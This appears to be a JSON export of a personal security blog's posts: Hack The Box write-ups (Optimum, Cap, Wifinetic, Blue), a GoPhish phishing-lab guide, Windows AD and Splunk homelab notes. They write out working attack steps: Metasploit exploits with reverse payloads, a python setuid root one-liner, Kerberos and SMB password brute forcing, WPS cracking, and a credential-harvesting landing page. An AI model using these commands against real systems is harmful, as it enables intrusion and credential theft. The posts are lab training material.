[{"content":"Foothold \u0026amp; Privilege Escalation — Optimum (HTB-style) Author: Angus Dawson\nTarget: 10.129.245.40 (lab box)\nAttacker: 10.10.14.29 (Kali)\nSummary: found HFS (HttpFileServer) on port 80, exploited CVE-2014-6287 with Metasploit to get a Meterpreter shell (user), then ran local post-exploit privesc modules and obtained Administrator to capture root.txt.\nTL;DR Recon: nmap showed HttpFileServer httpd 2.3 on port 80. Vulnerability: CVE-2014-6287 — RCE in Rejetto HttpFileServer (HFS). Exploit: exploit/windows/http/rejetto_hfs_exec (Metasploit) → Meterpreter → shell → user.txt. Post-exploit: enumerated privesc modules, iterated until a working local exploit delivered SYSTEM, then captured root.txt. Reconnaissance I started with a straightforward service scan to identify active services and versions:\nsudo nmap -sC -sV -oN initial 10.129.245.40 Key output (trimmed):\n80/tcp open http HttpFileServer httpd 2.3 Because HFS 2.3 was present, I searched for known vulnerabilities and found CVE-2014-6287 (RCE against HFS).\nExploitation — Remote Code Execution (Foothold) I used Metasploit’s rejetto_hfs_exec module to exploit the RCE.\nMetasploit commands (summary):\nuse exploit/windows/http/rejetto_hfs_exec set RHOSTS 10.129.245.40 set LHOST 10.10.14.29 set LPORT 4444 run (Options screenshot for reproducibility)\nThe module delivered a payload and opened a Meterpreter session. From Meterpreter, I dropped into a shell:\nmeterpreter \u0026gt; shell C:\\Users\\kostas\\Desktop\u0026gt; type user.txt 2e7bf8c5a4e47f73a710eed9035564bb User flag captured:\nPost-exploitation \u0026amp; Privilege Escalation With a user shell, I moved to local privilege escalation. I inspected Metasploit’s exploit/windows/local options and used a mix of automatic suggestion + manual enumeration. A short list of candidate modules is shown below:\nI attempted multiple modules. Some aborted due to version/architecture mismatches (example failure):\nAfter iterating, a local token/handle-based module completed successfully and produced a SYSTEM shell (example success output):\nFrom the elevated shell I read the Administrator/root flag:\nC:\\Users\\Administrator\\Desktop\u0026gt; type root.txt 288b316926a699a4f6e8e76b61f1dba9 Commands \u0026amp; Workflow (Appendix) Recon sudo nmap -sC -sV -oN initial 10.129.245.40 Exploit (Metasploit) msf6 \u0026gt; use exploit/windows/http/rejetto_hfs_exec msf6 exploit(rejetto_hfs_exec) \u0026gt; set RHOSTS 10.129.245.40 msf6 exploit(rejetto_hfs_exec) \u0026gt; set LHOST 10.10.14.29 msf6 exploit(rejetto_hfs_exec) \u0026gt; set LPORT 4444 msf6 exploit(rejetto_hfs_exec) \u0026gt; run Then in Meterpreter:\nmeterpreter \u0026gt; shell C:\\Users\\kostas\\Desktop\u0026gt; type user.txt Post-exploit (example) msf6 \u0026gt; use exploit/windows/local/ms16_032_secondary_logon_handle_privesc msf6 exploit(ms16_032_...) \u0026gt; set SESSION 1 msf6 exploit(ms16_032_...) \u0026gt; set LHOST 10.10.14.29 msf6 exploit(ms16_032_...) \u0026gt; run Tip: If a module aborts due to an unsupported OS/architecture, move on to additional modules or perform manual enumeration (services, scheduled tasks, drivers, installed software, unquoted service paths, weak ACLs).\nLessons Learned Check target OS/arch before running local exploits; many local modules require specific Windows builds/bitness. Iterate: privesc is rarely a single-hit step — try token manipulation, service misconfigurations, and weak permissions. Containment: HFS is a risky service to expose publicly; patch or replace it. Mitigations \u0026amp; Recommendations Patch HttpFileServer or remove/replace with a maintained alternative. Network segmentation: avoid exposing admin/file servers to untrusted networks. Least privilege: ensure services run with minimal required privileges and fix file/service permissions. Monitoring: create alerts for suspicious web requests and unexpected outbound connections. Gallery (process screenshots) Recon (nmap): ./images/optimum/nmap.png CVE lookup: ./images/optimum/found_CVE.png Metasploit exploit options: ./images/optimum/set_options.png Exploit / Meterpreter (foothold): ./images/optimum/foothold.png user.txt captured: ./images/optimum/user-flag.png Privesc candidates: ./images/optimum/privesc_modules.png Example privesc failure: ./images/optimum/privesc-fail.png Successful escalation output: ./images/optimum/privesc-success.png root.txt captured: ./images/optimum/root-flag.png Attribution \u0026amp; Ethics This writeup documents testing performed on a lab/CTF box. Do not run these techniques against systems you do not own or do not have explicit permission to test. Always follow legal and ethical guidelines.\n","permalink":"https://basil9099.github.io/ctf/optimum-htb/","summary":"\u003ch1 id=\"foothold--privilege-escalation--optimum-htb-style\"\u003eFoothold \u0026amp; Privilege Escalation — Optimum (HTB-style)\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAuthor:\u003c/strong\u003e Angus Dawson\u003cbr\u003e\n\u003cstrong\u003eTarget:\u003c/strong\u003e \u003ccode\u003e10.129.245.40\u003c/code\u003e (lab box)\u003cbr\u003e\n\u003cstrong\u003eAttacker:\u003c/strong\u003e \u003ccode\u003e10.10.14.29\u003c/code\u003e (Kali)\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eSummary:\u003c/strong\u003e found HFS (HttpFileServer) on port 80, exploited CVE-2014-6287 with Metasploit to get a Meterpreter shell (user), then ran local post-exploit privesc modules and obtained Administrator to capture \u003ccode\u003eroot.txt\u003c/code\u003e.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"tldr\"\u003eTL;DR\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRecon: \u003ccode\u003enmap\u003c/code\u003e showed \u003ccode\u003eHttpFileServer httpd 2.3\u003c/code\u003e on port 80.\u003c/li\u003e\n\u003cli\u003eVulnerability: \u003cstrong\u003eCVE-2014-6287\u003c/strong\u003e — RCE in Rejetto HttpFileServer (HFS).\u003c/li\u003e\n\u003cli\u003eExploit: \u003ccode\u003eexploit/windows/http/rejetto_hfs_exec\u003c/code\u003e (Metasploit) → Meterpreter → shell → \u003ccode\u003euser.txt\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ePost-exploit: enumerated privesc modules, iterated until a working local exploit delivered SYSTEM, then captured \u003ccode\u003eroot.txt\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"reconnaissance\"\u003eReconnaissance\u003c/h2\u003e\n\u003cp\u003eI started with a straightforward service scan to identify active services and versions:\u003c/p\u003e","title":"Foothold \u0026 Privilege Escalation — Optimum (HFS)"},{"content":" Spoiler / ethics: for lab use only. Do not deploy this against real users or networks you don\u0026rsquo;t own or have explicit permission to test. Phishing is illegal and harmful outside of authorized environments.\nTL;DR Create a sending profile (SMTP + credentials). Build a landing page (paste SET index.html), add redirect to the real site. Build the email template (paste 2-step verification HTML), enable “change links to landing page”. Create and launch a campaign (use attacker IP + listener port in URL). Monitor the campaign — captured creds and metadata appear in GoPhish. Tools used GoPhish — phishing framework Social-Engineer Toolkit (SET) — landing-page and email templates A lab attacker VM (Kali) and isolated target VM/host Full step-by-step 1. Start GoPhish Open the GoPhish dashboard in your attacker VM (e.g. http://localhost:3333 or http://\u0026lt;ATTACKER_IP\u0026gt;:3333 depending on your setup).\n2. Set up a Sending Profile Go to Sending Profiles → New Profile. SMTP server (example): smtp.gmail.com:587. Use a lab Gmail account and an app password or other valid SMTP credentials. Save and Send a test email to verify SMTP connectivity. Tip: use a throwaway lab account and app passwords — keep credentials isolated to the lab.\n3. Create a Landing Page In GoPhish: Landing Pages → New Landing Page. Give it a name (e.g. Google 2FA clone). Paste the HTML template from SET into the landing page body. Typical SET path on Kali:\n/usr/share/set/src/html/templates/google/index.html Add a redirect to the real site after the form submits to keep the illusion intact. For example: \u0026lt;script\u0026gt; // after capturing creds, redirect to the real Google site window.location = \u0026#34;https://account.google.com\u0026#34;; \u0026lt;/script\u0026gt; Save the landing page. 4. Create the Email Template In GoPhish: Email Templates → New Template. Copy the 2-step verification (or similar) HTML source from SET and paste it into the email body. Tick “Change links to landing page” so GoPhish rewrites links to point at your hosted phishing page. Add a realistic subject line, e.g. Action required: Confirm your 2-Step Verification. Save the template. 5. Create and Launch a Campaign Campaigns → New Campaign. Choose the Email Template and Landing Page you created. Add recipient addresses (lab addresses only). Important: For the campaign URL field, use your attacker machine\u0026rsquo;s IP and include the listener port if required. Example: http://\u0026lt;ATTACKER_IP\u0026gt;:8080# # e.g. http://192.168.56.101:8080# If you see errors, confirm the port is included. GoPhish commonly serves landing pages on ports such as 8080 or 3333. Launch the campaign. 6. Test \u0026amp; Validate Refresh the GoPhish campaign page — it should show the email as Sent. From the target VM or another host, open the received email and click the phishing link. Submit credentials on the landing page. Confirm the browser address bar shows your attacker IP (this confirms redirection to your hosted page).\nIn GoPhish, open the campaign details and expand the drop-down — captured credentials and metadata (IP, user-agent, time) will be visible. Troubleshooting SMTP test fails\nDouble-check username/password or app password. Ensure outbound firewall rules allow SMTP egress from the attacker VM. Landing page not serving / 404\nConfirm the GoPhish listener port and include it in URLs (e.g., :8080). Clicked link redirects to wrong page\nVerify that Change links to landing page was checked when importing the email. No credentials captured\nConfirm the landing page form action posts to a handler GoPhish captures. The SET template typically includes compatible form handling. Check GoPhish logs for server-side errors. Safety \u0026amp; operational notes Always use isolated lab networks (host-only or internal virtual networks) and throwaway accounts. Rotate and document lab credentials — never reuse real-world passwords. Keep every test contained and obtain written permission if demonstrating to others. Useful snippets SET landing page path\n/usr/share/set/src/html/templates/google/index.html Example campaign URL format\nhttp://\u0026lt;ATTACKER_IP\u0026gt;:\u0026lt;PORT\u0026gt;# # e.g. http://192.168.56.101:8080# Example redirect snippet to add to landing page\n\u0026lt;script\u0026gt; // after capturing creds, redirect to the real site window.location = \u0026#34;https://account.google.com\u0026#34;; \u0026lt;/script\u0026gt; Final checklist GoPhish dashboard running Sending profile created + test email sent Landing page created (SET HTML pasted) Redirect to real site added Email template created + “change links” ticked Campaign created (attacker IP + port in URL) Campaign launched Credentials verified in GoPhish campaign details Resources GoPhish https://getgophish.com/ Loi Liang Yang https://www.youtube.com/watch?v=dktthMkQF-Q Ethics reminder: this guide is for lab learning only. Always obtain permission before testing real systems.\n","permalink":"https://basil9099.github.io/homelab/phishing_simulation/","summary":"Step-by-step lab guide to run a safe phishing simulation using GoPhish and SET (Social-Engineer Toolkit). For isolated lab environments only.","title":"Phishing simulation — GoPhish lab guide"},{"content":" ⚠️ Spoiler warning — retired HTB machine. This writeup documents my playthrough of the retired Hack The Box machine Cap. VPN IPs shown are HTB-assigned addresses used during the box.\n🔍 Recon Initial scan:\nnmap -sV -sC -oN initial 10.129.242.125 While enumerating the web application I discovered an IDOR (insecure direct object reference) path under /data: The data ID in the URL can be changed to reveal something interesting\nhttp://10.129.242.125/data/0 Accessing the data endpoint allowed me to download a PCAP file capturing unencrypted FTP traffic. 🧩 PCAP Analysis \u0026amp; Credentials I opened the PCAP in Wireshark and inspected the FTP traffic. Credentials were sent in cleartext; I recovered the following valid account:\nNathan\u0026rsquo;s Credentials username: nathan password: Buck3tH4TF0RM3! With those credentials I could log into the host as nathan (SSH). 🖥️ Foothold (SSH as nathan) SSH into the box:\nssh nathan@10.129.242.125 enter password: Buck3tH4TF0RM3! Found the user flag:\ncat /home/nathan/user.txt \u0026ldquo;ffebb9968efc6ca3d75c8cd36357cb06\u0026rdquo; 🔐 Privilege Escalation (file capabilities) Local enumeration for Linux capabilities:\n# list capabilities recursively from root (hide permission denied noise) getcap -r / 2\u0026gt;/dev/null Relevant output:\n/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip\nWhat this means: getcap shows POSIX file capabilities on binaries. The entry for /usr/bin/python3.8 includes cap_setuid, indicating that this binary can change its UID — it can be abused to escalate privileges without needing a password. Exploit (use with care; this is what I ran on the box): /usr/bin/python3.8 -c \u0026#39;import os; os.setuid(0); os.system(\u0026#34;/bin/bash\u0026#34;)\u0026#39; That spawned a root shell:\nroot@cap:~# whoami root 🏁 Root Flag cat /root/root.txt \u0026ldquo;9589c70870530feec969223b4baca6fb\u0026rdquo; 🔑 Takeaways IDORs can expose sensitive artifacts (PCAPs, backups) — always check object enumeration endpoints like /data/.\nPCAP analysis with Wireshark is invaluable for recovering plaintext credentials when services are unencrypted (FTP/HTTP basic auth).\nLinux file capabilities (checked via getcap) often provide escalation paths; cap_setuid on an interpreter (python) is a high-impact finding.\nWhen a binary has cap_setuid, carefully consider executing it to elevate privileges — prefer non-interactive, audited commands if available.\n📚 Resources \u0026amp; Notes getcap / setcap documentation (man pages)\nWireshark — follow TCP stream for FTP credentials\nCAPABILITY reference: Linux capabilities cap_setuid, cap_net_bind_service, etc.\n","permalink":"https://basil9099.github.io/ctf/cap-htb/","summary":"IDOR → PCAP recovery of credentials → SSH user shell → Linux file capabilities (getcap) → root via python3.8 capability.","title":"Cap — HackTheBox Writeup"},{"content":"Overview Short notes from a homelab pentest exercise. Goal: find an Active Directory host on my home network, enumerate, obtain valid credentials, and confirm a shell on the target using evil-winrm. Screenshots of important steps are included as placeholders below.\nLab discovery First perform an ICMP/host-discovery sweep across the LAN to find the AD server.\n# Host discovery (ping sweep) nmap -sn 192.168.0.0/24 Result: target identified as 192.168.0.147.\nTarget service scan Run an nmap service/version scan on the discovered target.\nnmap -sV -sC 192.168.0.147 Conclusion: host appears to be an Active Directory domain controller (Kerberos, LDAP, AD ports present).\nKerberos user enumeration Use kerbrute to enumerate valid Kerberos principals against the KDC.\nkerbrute userenum --dc 192.168.0.147 -d homelab.local /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt Kerbrute output: 2025/09/18 18:37:26 \u0026gt; Using KDC(s): 2025/09/18 18:37:26 \u0026gt; 192.168.0.147:88\n2025/09/18 18:37:26 \u0026gt; [+] VALID USERNAME:\tadministrator@homelab.local 2025/09/18 18:37:26 \u0026gt; Done! Tested 17 usernames (1 valid) in 0.010 seconds\nFound a valid username: administrator@homelab.local\nPassword brute force Use crackmapexec against SMB to try password lists for the discovered user.\ncrackmapexec smb 192.168.0.147 -u administrator -p /usr/share/wordlists/rockyou.txt Success!\nSMB 192.168.0.147 445 WIN-PKRRP8BT2N6 [+] homelab.local\\administrator:Orbit9#sxT (Pwn3d!)\nGaining a shell (Evil-WinRM) With the discovered administrator credentials, use evil-winrm to obtain a remote PowerShell session.\nevil-winrm -i 192.168.0.147 -u administrator -p \u0026#39;Orbit9#sxT\u0026#39; Expected: authenticated remote shell as administrator.\nProof of access Create a simple file on the Administrator desktop as proof-of-compromise (example PowerShell command used via Evil-WinRM):\npowershell -c \u0026ldquo;Set-Content -Path $env:USERPROFILE\\Desktop\\proof.txt -Value \u0026lsquo;Proof: compromised via evil-winrm by basil9099 on 18/09/2025.\u0026rsquo;\u0026rdquo;\nI did not do this, but generally a good idea to verify the file exists (via shell):\ntype $env:USERPROFILE\\Desktop\\proof.txt\nor in evil-winrm: ls C:\\Users\\Administrator\\Desktop\\proof.txt\nNotes, mitigations \u0026amp; lessons learned Kerberos user enumeration was effective — consider disabling anonymous user lookups where possible and monitoring for large numbers of AS-REQ/TGS-REQ attempts.\nRate-limit and alert on authentication brute force activity; consider enforcing multifactor authentication for privileged accounts.\nRemove or restrict use of weak/guessable passwords for domain administrator accounts; apply password complexity and rotation rules.\nAvoid exposing plaintext services (FTP, HTTP) on networks where credential harvesting is possible.\nKeep NTP/time sync in AD to avoid Kerberos issues (and to avoid false positives during testing).\nLog and alert on unusual authentication activity, and monitor for tools/traffic patterns associated with Kerberoasting and brute force.\n","permalink":"https://basil9099.github.io/homelab/windows_pentest/","summary":"Step-by-step notes from a homelab penetration test: discovery, enumeration, Kerberos user discovery, brute force, and admin shell with Evil-WinRM. Includes commands used and outputs captured during the exercise.","title":"Pentest workflow (Windows AD)"},{"content":" 🛡️ Splunk Enterprise — Windows Homelab\nCentralised logging + detection engineering for the Cybersecurity Homelab.\n1. Lab Topology Host Role OS WIN-SPLUNK Splunk Enterprise 9.x Windows Server 2022 WIN-DC01 AD DS / DNS / DHCP Windows Server 2022 WIN-WS01 Workstation + Sysmon Windows 10 Pro pfSense Perimeter firewall pfSense CE 2.7 2. Apps / Add-ons Installed App Purpose Splunk App for Windows Infrastructure Dashboards for AD, DNS, DHCP, etc. Splunk Security Essentials (SSE) 120+ ATT\u0026amp;CK-mapped detections Splunk CIM Add-on Data-model normalisation Splunk App for Sysmon Visualises Sysmon Event ID 1–24 3. Data onboarding 3.1 Universal Forwarder (UF) installer example msiexec /i splunkforwarder-9.x.x-x64-release.msi AGREETOLICENSE=Yes ^ RECEIVING_INDEXER=\u0026#34;WIN-SPLUNK:9997\u0026#34; WINEVENTLOG_SEC_ENABLE=1 ^ WINEVENTLOG_SYS_ENABLE=1 3.2 Event Log Collection Config Enabled logs:\nApplication Security Setup System 4. Verification \u0026amp; Search 4.1 Successful ingestion check index=* | stats count by sourcetype # Confirmed: XmlWinEventLog source type with 659+ events. 4.2 Error checks index=* sourcetype=\u0026#34;XmlWinEventLog:Application\u0026#34; Type=\u0026#34;Error\u0026#34; # Result: 0 application-level errors found. Dashboard example (Windows VM Security) shows:\nFailed login attempts Successful logins Most active users Recent application errors 🔐 Brute-Force Detection Simulation (Kali → Windows → Splunk) Goal: Simulate failed logins from Kali to a Windows 10 host and verify logging, forwarding and detection in Splunk.\nTest steps (summary) Nmap scan to identify SMB/RDP: nmap -sV -sC -oN scan-target 192.168.0.147 Hydra SMB brute-force: hydra -l testuser -P /usr/share/wordlists/rockyou.txt smb://192.168.0.147 # Expect NT_STATUS_LOGON_FAILURE events Manual smbclient verification: smbclient -L //192.168.0.147 -U testuser # returns NT_STATUS_LOGON_FAILURE Scripted brute-force loop (generate many failures): for i in {1..10}; do smbclient -L //192.168.0.147 -U testuser%\u0026#34;wrongpass\u0026#34; -m SMB2 done Splunk detection query (example) index=wineventlog EventCode=4625 | stats count by Account_Name, src_ip | where count \u0026gt; 5 If count \u0026gt; 5 per account and src_ip, trigger an alert — this was the condition used to demonstrate detection.\nSuccess Criteria Met\nAttack from Kali → logged on Windows (EventCode 4625) → forwarded by UF → indexed \u0026amp; searchable in Splunk → alert triggered \u0026amp; visible in dashboard. ✅ Summary \u0026amp; Next Steps Logs from Windows hosts ingested successfully. Dashboards and queries validated visibility of relevant event types. Next: integrate EDR, SIEM dashboards, and simulated phishing to test detection coverage. 🔗 References Splunk Universal Forwarder docs Splunk App for Windows Infrastructure re: Windows Event IDs (particularly 4625) HTB retired machines / homelab resources ","permalink":"https://basil9099.github.io/homelab/splunk_install+bruteforce_test/","summary":"Centralised logging and detection engineering in my Windows homelab using Splunk Enterprise and Universal Forwarders.","title":"Splunk Enterprise — Windows Homelab Deployment"},{"content":" ⚠️ Spoiler warning — retired HTB machine. This writeup documents my playthrough of the retired Hack The Box machine Wifinetic. The VPN IPs shown below are the HTB-assigned VPN addresses used during the box (left intact here for reproducibility). Do not attempt this on non-authorised or active systems.\nOverview Platform: Hack The Box (retired) Target OS: OpenWrt / Embedded Linux (router-like device) Focus: anonymous FTP → backup extraction → credential reuse (SSH) → local wireless enumeration → WPS PIN attack (reaver) → root shell Difficulty: Easy / Medium (requires local wireless tooling) 🔍 Recon Initial scan:\nnmap -sV -sC -oN initial 10.129.229.90 Result highlights (relevant lines):\n21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r\u0026ndash;r\u0026ndash; 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt | -rw-r\u0026ndash;r\u0026ndash; 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf | -rw-r\u0026ndash;r\u0026ndash; 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf | -rw-r\u0026ndash;r\u0026ndash; 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar | -rw-r\u0026ndash;r\u0026ndash; 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf Anonymous FTP and the router backup archive (backup-OpenWrt-2023-07-26.tar) were the highest-value findings.\n📂 FTP enumeration \u0026amp; archive extraction Anonymous FTP allowed downloading files as the ftp user. I downloaded the backup archive and extracted it locally:\ndownload get backup-OpenWrt-2023-07-26.tar tar -xvf backup-OpenWrt-2023-07-26.tar Inside the extracted filesystem I inspected OpenWrt config files and discovered a Wi-Fi passphrase in plaintext:\n\u0026ldquo;VeRyUniUqWiFIPasswrd1!\u0026rdquo;\nI also noted local account names recorded in the extracted /etc/passwd.\n🪪 Initial access — credential reuse → SSH (netadmin) I tried reusing the discovered Wi-Fi password against local accounts from /etc/passwd and successfully logged in as netadmin:\nssh netadmin@10.129.229.90 password: VeRyUniUqWiFIPasswrd1! User flag:\nnetadmin@wifinetic:~$ cat user.txt \u0026ldquo;03687ad349ad3fd2ab27afb86bc10f1b\u0026rdquo;\n📡 Local enumeration — wireless roles \u0026amp; capabilities It is now time to see how we can escalate privileges.\nFrom the netadmin shell I enumerated network and wireless services:\nifconfig systemctl status wpa_supplicant.service systemctl status hostapd.service I used iwconfig as it works similarly to ifconfig, but it is dedicated to wireless networking interfaces.\nIt is used to set the parameters of the network interface and configure wireless operation.\niwconfig iw dev The iw dev command lists information about available wireless network interfaces and their capabilities.\nIt is part of the iw utility, which is a powerful tool for configuring and managing wireless devices.\nFindings: wlan1 was a managed client (connected to ESSID: \u0026ldquo;OpenWrt\u0026rdquo;).\nwlan0 was in Master mode (the device acting as the AP).\nmon0 (monitor mode) was present on the device.\nI also checked file capabilities:\ngetcap -r / 2\u0026gt;/dev/null \u0026hellip; /usr/bin/reaver = cap_net_raw+ep /usr/bin/reaver had cap_net_raw, meaning it could perform raw network operations needed for WPS attacks.\n⚡ Privilege Escalation — WPS PIN attack (reaver) From iw / iwconfig output I identified the AP BSSID:\n\u0026ldquo;02:00:00:00:00:00\u0026rdquo;\nI launched a WPS PIN attack from the device (using the local reaver binary) on the monitor interface:\nreaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1 Reaver completed and returned the AP Wi-Fi passphrase:\n\u0026ldquo;WhatIsRealAnDWhAtIsNot51121!\u0026rdquo;\nUsing that passphrase I switched to root:\nnetadmin@wifinetic:~$ su root Password: WhatIsRealAnDWhAtIsNot51121! Root flag:\nroot@wifinetic:/home/netadmin# cat /root/root.txt \u0026ldquo;94866ea86e569ab12e3c2d0f5893db19\u0026rdquo;\n🏁 Flags User flag: 03687ad349ad3fd2ab27afb86bc10f1b\nRoot flag: 94866ea86e569ab12e3c2d0f5893db19\n🔑 Takeaways Backups leak secrets. Firmware/backups (OpenWrt configs) contained a Wi-Fi passphrase — treat backups as sensitive.\nCredential reuse works. The Wi-Fi password reused on a local account provided the initial foothold.\nLocal tooling matters. getcap revealed reaver with cap_net_raw—check file capabilities during enumeration.\nWPS is risky. If WPS is enabled, Reaver-style PIN attacks can reveal strong credentials; disable WPS where possible.\nDefensive steps: restrict anonymous FTP, avoid storing plaintext credentials in backups, disable WPS on APs, and remove unnecessary cap_net_raw capabilities from binaries.\n⚙️ Full command summary (ordered) Recon nmap -sV -sC -oN initial 10.129.229.90\nFTP (anonymous) -\u0026gt; download -\u0026gt; extract get backup-OpenWrt-2023-07-26.tar tar -xvf backup-OpenWrt-2023-07-26.tar SSH access (credential reuse) ssh netadmin@10.129.229.90 password: VeRyUniUqWiFIPasswrd1! Local enumeration ifconfig systemctl status wpa_supplicant.service systemctl status hostapd.service iwconfig iw dev getcap -r / 2\u0026gt;/dev/null Reaver WPS attack (from compromised box) reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1 Escalate to root su root cat /root/root.txt 📚 Resources OpenWrt / router backup forensics guides\nreaver documentation — WPS PIN attack tool\nLinux file capabilities: getcap / setcap docs\nHTB retired machines archive (for context \u0026amp; learning)\n","permalink":"https://basil9099.github.io/ctf/wifinetic-htb/","summary":"Anonymous FTP → backup extraction → credential reuse (SSH) → local wireless enumeration → WPS PIN attack (reaver) → root via local escalation.","title":"Wifinetic — HackTheBox Writeup"},{"content":" 🖥️ Homelab note This post documents the Windows Server with Active Directory environment I use for training, testing, and detection exercises.\nOverview I run a fully configured Windows Server acting as an Active Directory (AD) domain controller in my cybersecurity homelab. The environment simulates a realistic enterprise domain and is used for practicing penetration testing techniques, AD security administration, and detection exercises.\nWhy run Active Directory in the lab? Real-world scenarios — replicate corporate AD environments for hands-on learning. User \u0026amp; group management — practice account lifecycle, permissions, and role separation. Penetration testing — safely test AD-specific techniques (Kerberoasting, AS-REP, delegation, etc.). Detection \u0026amp; logging — instrument the lab to understand log sources, event IDs, and alert tuning. Simulated user accounts Use these sample accounts for exercises and role-based scenarios.\nUsername First name Last name Role / Description Office Phone Email alice.it Alice Smith Helpdesk Analyst HQ-102 +1 (555) 0102 alice.it@homelab.local bob.hr Bob Johnson HR Assistant HQ-201 +1 (555) 0103 bob.hr@homelab.local carol.finance Carol Bright Financial Analyst HQ-301 +1 (555) 0104 carol.finance@homelab.local david.bright David Bright Finance Manager HQ-302 +1 (555) 0105 david.bright@homelab.local Tip: store these users in a dedicated organizational unit (OU) and apply realistic group memberships (e.g., Domain Users, Finance, Helpdesk) to practice ACL and delegation scenarios.\nFeatures \u0026amp; configuration highlights Domain: homelab.local (internal DNS + AD-integrated DNS) Group Policy: enforced password complexity, lockout policy, and baseline login restrictions. Role-based access: roles and groups created to mirror real org structures (Helpdesk, HR, Finance). Service accounts: segregated service accounts for apps and scheduled tasks; test constrained delegation scenarios in a controlled way. Backups \u0026amp; snapshots: use VM snapshots and exported backups before major changes or offensive testing. Usage tips \u0026amp; security exercises Here are practical exercises you can run in this lab:\nPrivilege escalation Audit local and domain group memberships (whoami /groups, AD ACLs). Search for misconfigured service accounts, weak service principal names (SPNs), and vulnerable scheduled tasks. Authentication attacks Simulate password spraying and brute-force at safe rates against test accounts (do not test on production). Practice Kerberoasting and AS-REP roasting on appropriate accounts. Log analysis \u0026amp; detection Collect Windows Event Logs (Security, System, Application) to a central log host. Simulate suspicious behavior (e.g., lateral movement) and tune alerts for Event IDs relevant to AD compromise. Quick commands \u0026amp; references AD enumeration (from attacker host with ldapsearch / impacket):\n# LDAP query example (replace with your DC) ldapsearch -x -H ldap://dc.homelab.local -b \u0026#34;DC=homelab,DC=local\u0026#34; \u0026#34;(objectClass=user)\u0026#34; sAMAccountName Kerberos quick tests (Linux attacker):\nkinit alice.it@HOMELAB.LOCAL klist Windows checks (on domain controller / domain-joined host):\nlist policies and domain info Get-ADDomain Get-ADUser -Filter * -Properties MemberOf | Select sAMAccountName, MemberOf Next steps / roadmap Planned improvements to the lab:\nIntegrate EDR (Endpoint Detection \u0026amp; Response) for behavioral testing.\nConfigure SIEM (e.g., Splunk/ELK) and dashboards for AD-centric alerts.\nAdd simulated phishing and phishing-resiliency exercises.\nDeploy additional network services (Exchange, file servers) for richer attack surfaces.\nNotes \u0026amp; safe-use reminders This environment is for authorized testing only. Don’t run these exercises against production networks or systems you don’t own.\nTake snapshots or backups before performing offensive tests to ensure you can restore the lab quickly.\nResources Microsoft Docs: Active Directory overview\nImpacket \u0026amp; Rubeus for AD testing and Kerberos tooling\nMITRE ATT\u0026amp;CK for enterprise techniques and detection guidance\n","permalink":"https://basil9099.github.io/homelab/windows-ad-lab/","summary":"Overview of my Active Directory homelab: domain setup, users, security exercises, and next steps for monitoring and detection.","title":"Windows Server with Active Directory (AD) — Homelab"},{"content":" ⚠️ Spoiler warning: This covers a retired HTB machine. This writeup documents my playthrough of the retired Hack The Box machine Blue.\nThe VPN IPs shown below are the HTB-assigned VPN addresses used during the box (left intact here for reproducibility). Do not attempt this on non-authorised or active systems.\nBlue (HTB) — Walkthrough Overview Platform: Hack The Box (retired) Target OS: Windows 7 Professional SP1 Focus: SMB enumeration → EternalBlue (MS17-010) → SYSTEM shell Difficulty: Easy Recon Initial scan:\nnmap -sV -sC -oN scans/blue-initial 10.129.242.117 Result highlights (relevant line)\n445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 A full scan confirmed SMB was exposed and appeared to be running SMBv1. SMB Enumeration Anonymous enumeration with enum4linux\nenum4linux -a 10.129.242.117 Anonymous SMB session also succeeded\nsmbclient -L //10.129.242.117/ -N Shares observed:\nADMIN$ C$ IPC$ Share Users\nGiven Windows 7 + SMBv1 exposure, EternalBlue (MS17-010) looked likely. Exploitation (MS17-010 / EternalBlue) Check target with Metasploit\u0026rsquo;s SMB version scanner:\nmsf6 \u0026gt; use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) \u0026gt; set RHOSTS 10.129.242.117 msf6 auxiliary(scanner/smb/smb_version) \u0026gt; run Confirmed vulnerable\n[+] 10.129.242.117:445 - Host is running Windows 7 Professional SP1 Host is likely VULNERABLE to MS17-010!\nLaunch the exploit: msf6 \u0026gt; use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set RHOSTS 10.129.242.117 msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; set LHOST 10.10.14.5 msf6 exploit(windows/smb/ms17_010_eternalblue) \u0026gt; run Success:\n[+] Meterpreter session 1 opened Privilege Escalation Drop into an interactive shell from Meterpreter:\nmeterpreter \u0026gt; shell C:\\Windows\\system32\u0026gt; whoami Result:\nnt authority\\system The exploit provided full SYSTEM privileges.\nUser flag:\nC:\\Users\\haris\\Desktop\u0026gt; type user.txt \u0026ldquo;1b3265edfce880834b5e8e8fc8ac5a18\u0026rdquo; Root flag:\nC:\\Users\\Administrator\\Desktop\u0026gt; type root.txt \u0026ldquo;76a957ccd469d05e2883b49b77079847\u0026rdquo; Takeaways Always check SMB version — legacy SMBv1 is a red flag.\nEternalBlue is a classic exploit; patched since 2017, but still useful to study.\nMetasploit automates exploitation, but understanding the underlying vulnerability (buffer overflow in SMBv1) is important.\nEnumeration (enum4linux, smbclient) confirmed access, but exploitation was the real path in this box.\nResources MS17-010 (Microsoft Security Bulletin).\nHack The Box — retired machines archive.\nMy GitHub repo (basil9099.github.io) with scans/notes.\n","permalink":"https://basil9099.github.io/ctf/blue-htb/","summary":"Exploiting MS17-010 (EternalBlue) on a Windows 7 SP1 target. Recon, SMB enumeration, exploitation, and proof of SYSTEM access.","title":"Blue 